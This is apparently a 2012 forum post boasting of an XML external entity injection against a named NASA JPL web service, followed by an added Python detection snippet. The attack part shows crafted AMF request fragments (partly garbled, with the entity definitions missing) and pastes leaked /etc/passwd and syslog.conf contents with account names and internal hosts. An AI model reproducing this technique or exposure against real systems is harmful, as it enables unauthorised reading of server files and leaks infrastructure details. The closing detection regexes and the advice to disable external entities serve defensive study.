
19.05.2012, 17:33
XML-Inject on NASA.GOV
We send a specially crafted packet:
PHP code:
Content-Type = 'application/x-amf';
Host = 'informal.jpl.nasa.gov';
Content-Length = '904'; // the length of your request goes here. The value varies
Request.Data = '
]>
bodyclientIdcorrelationId
destinationheadersmessageId
operationtimestamptimeToLive
DSIdDSMessagingVersion
nil1
&x3;
500
To which we see the response
PHP code:
Response.Data=
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:bin:x:2:2::/usr/bin:/bin/false
sys:x:3:3::/:adm:x:4:4:Admin:/var/adm:/bin/false
lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false
uucp:x:5:5:uucp Admin:/usr/lib/uucp:/bin/false nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/bin/false smmsp:x:25:25:SendMail
Message Submission Program:/:/bin/false listen:x:37:4:Network
Admin:/usr/net/nls:/bin/false gdm:x:50:50:GDM
Reserved UID:/:/bin/false webservd:x:80:80:WebServer
Reserved UID:/opt/home/webservd:/bin/pfsh
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:nobody:x:60001:60001:NFS
Anonymous Access User:/:/bin/false noaccess:x:60002:60002:No
Access User:/:/bin/false nobody4:x:65534:65534:SunOS 4.x NFS
Anonymous Access User:/:/bin/false metrics:x:150:10:System
Metrics Account:/opt/metrics:/bin/sh pdiag:x:153:10:Patchdiag
Account:/opt/pdiag:/bin/sh sysaudit:x:152:10:System Audit
Account:/opt/sysaudit:/bin/sh+@jplit-sa:x:::::: +@web:x::::::
A variation of the first request:
PHP code:
Content-Type = 'application/x-amf';
Host = 'informal.jpl.nasa.gov';
Content-Length = '904'; // the length of your request goes here. The value varies
Request.Data = '
]>
bodyclientIdcorrelationId
destinationheadersmessageId
operationtimestamptimeToLive
DSIdDSMessagingVersion
nil1
&x3;
500
To which we see the response
PHP code:
Response.Data=
#ident "@(#)syslog.conf 1.5 98/12/14 SMI" /* SunOS 5.0 */ #
# Copyright (c) 1991-1998 by Sun Microsystems, Inc.
# All rights reserved. #
# syslog configuration file. #
# This file is processed by m4 so be careful to quote (`') names
# that match m4 reserved words. Also, within ifdef's, arguments
# containing commas must be quoted. #
# JPLIT syslog.conf # last updated 2008-06-24
# *.err;kern.notice;auth.notice /dev/sysmsg *.info;kern.debug;auth.err;mail.crit;local0.crit
/var/adm/messages
*.alert;kern.err;daemon.err operator
*.alert root*.emerg
*auth.notice/var/log/authlog mail.info/var/log/syslog
# Log ipfilter info separately: local0.info /var/log/ipflog
# if a non-loghost machine chooses to have authentication messages
# sent to the loghost machine, un-comment out the following line:
#auth.notice ifdef(`LOGHOST', /var/log/authlog, @loghost) #mail.debug ifdef(`LOGHOST', /var/log/syslog, @loghost) #
# non-loghost machines will use the following lines to cause "user"
# log messages to be logged locally. # ifdef(`LOGHOST', , user.err /dev/sysmsg user.err /var/adm/messages user.alert `root, operator' user.emerg * ) # #
# Uncomment this line to send syslog data to JPL Security:
# *.err;daemon.notice;auth.info @jplnsm.jpl.nasa.gov
# 3DB8AF0E-381B-5C34-E477-F5E594ECC3360.03DB8AF0E-380E-7324-6A71-ABBB0CDA7BAF
I'll soon post a small self-written utility for walking through directories =)
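An added detection example, not part of the original post: the request above carries DTD remnants (`]>` and the `&x3;` entity reference) in an `application/x-amf` body, and the response returns passwd-format records, so both directions can be flagged. The function names, the threshold and the sample bytes are constructed for illustration.

```python
import re

# Assumption: legitimate clients of an AMF/XML messaging endpoint never send a
# DTD, so any <!DOCTYPE or <!ENTITY declaration in the body is worth an alert.
DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
# passwd(4) record: name:pw:uid:gid:gecos:home:shell
PASSWD_RE = re.compile(
    rb"(?<![\w-])[a-z_][a-z0-9_-]{0,31}:[^:\s]*:\d+:\d+:[^:\n]*:[^:\s]*:[^:\s]*"
)
XML_TYPES = {"application/x-amf", "application/xml", "text/xml"}


def inspect_request(content_type, body):
    """Return one finding per DTD declaration in an XML-bearing request body."""
    if content_type.split(";")[0].strip().lower() not in XML_TYPES:
        return []
    return ["dtd-declaration:" + m.group(1).decode().upper()
            for m in DTD_RE.finditer(body)]


def inspect_response(body, threshold=3):
    """Flag a response body that carries several passwd-format records."""
    hits = PASSWD_RE.findall(body)
    return ["passwd-records:%d" % len(hits)] if len(hits) >= threshold else []


# Constructed samples (not captured traffic). The entity is internal and harmless.
SAMPLE_REQUEST = b'\x00\x03\x00\x00<!DOCTYPE m [<!ENTITY x3 "constructed">]><m>&x3;</m>'
SAMPLE_RESPONSE = (
    b"root:x:0:0:Super-User:/:/sbin/sh\n"
    b"daemon:x:1:1::/:\n"
    b"bin:x:2:2::/usr/bin:\n"
    b"lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false\n"
)

if __name__ == "__main__":
    print(inspect_request("application/x-amf", SAMPLE_REQUEST))
    print(inspect_response(SAMPLE_RESPONSE))
    print(inspect_response(b"status:ok time:12:30:05"))
```

Detection complements the fix, which is to disable DTD and external entity processing in the XML parser behind the endpoint.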